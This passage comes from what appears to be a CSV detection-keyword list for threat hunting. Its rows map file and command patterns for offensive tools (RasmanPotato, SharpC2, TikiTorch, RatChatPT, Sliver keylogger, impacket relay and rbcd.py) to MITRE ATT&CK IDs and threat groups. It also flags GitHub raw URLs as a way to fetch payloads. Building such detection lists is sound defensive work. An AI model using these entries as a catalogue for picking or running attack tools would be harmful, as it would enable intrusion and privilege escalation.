Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","10","4","353","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" +"*RasMan.vcxproj*","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","10","4","353","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" +"*rasman_c.c*","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","10","4","353","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" +"*rasman_h.h*","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","10","4","353","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" +"*RasmanPotato-master*","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","1","N/A","10","4","353","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" +"*rasta-mouse*","offensive_tool_keyword","Github Username","github user author of various offensive tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/rasta-mouse","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*rasta-mouse/PPEnum*","offensive_tool_keyword","cobaltstrike","Simple BOF to read the protection level of a process","T1012","TA0007","N/A","N/A","Reconnaissance","https://github.com/rasta-mouse/PPEnum","1","1","N/A","N/A","1","90","7","2023-05-10T16:41:09Z","2023-05-10T16:38:36Z" +"*rasta-mouse/RuralBishop*","offensive_tool_keyword","RuralBishop","creates a local RW section in UrbanBishop and then maps that section as RX into a remote process","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004","TA0005 - TA0003 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/RuralBishop","1","1","N/A","10","2","101","28","2020-07-19T18:47:44Z","2020-07-19T18:47:38Z" +"*rasta-mouse/SharpC2*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*rasta-mouse/ThreatCheck*","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z" +"*rasta-mouse/TikiTorch*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" +"*ratchatPT*/bin/bash*","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","0","risk of False positive","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" +"*RatChatPT.exe*","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","N/A","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" +"*RatChatPT.exe*","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","risk of False positive","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" +"*RatChatPT_windows.exe*","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","N/A","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" +"*RatChatPT_windows.exe*","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","risk of False positive","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" +"*ratchatpt-main*","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","0","N/A","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" +"*ratchatpt-main*","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","risk of False positive","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" +"*raw*/straight-shooter.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*raw.githubusercontent.com*.7z*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.apk*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.app*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.as*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.asc*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.asp*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.bash*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.bat*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.beacon*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.bin*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.bpl*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.c*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.cer*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.cmd*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.com*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.cpp*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.crt*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.cs*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.csh*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.dat*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.dll*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.docm*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.dos*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.exe*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.go*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.gz*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.hta*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.iso*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.jar*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.js*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.lnk*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.log*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.mac*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.mam*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.msi*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.msp*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.nexe*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.nim*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.otm*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.out*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.ova*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.pem*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.pfx*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.pl*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.plx*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.pm*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.ppk*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.ps1*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.psm1*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.pub*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.py*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.pyc*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.pyo*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.rar*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.raw*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.reg*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.rgs*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.RGS*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.run*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.scpt*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.script*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.sct*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.sh*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.ssh*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.sys*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.teamserver*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.temp*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.tgz*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.tmp*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.vb*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.vbs*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.vbscript*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.ws*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.wsf*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.wsh*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.X86*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.X86_64*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.xlam*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.xlm*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.xlsm*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw.githubusercontent.com*.zip*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*raw_keylogger.tar.gz*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1056-001 - T1056-002 - T1056-003 - T1056-004 - T1056-005 - T1003 - T1113 - T1213","TA0006 - TA0009","N/A","N/A","Collection - Credential Access - Exfiltration","https://github.com/trustedsec/SliverKeylogger","1","1","N/A","N/A","2","127","38","2023-09-22T19:39:04Z","2022-06-17T19:32:53Z" +"*rawrelayserver.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*rawSHA1_linkedIn_fmt_plug*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*rbcd.py -delegate-from * -delegate-to * -dc-ip * -action write *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*rbcd.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral 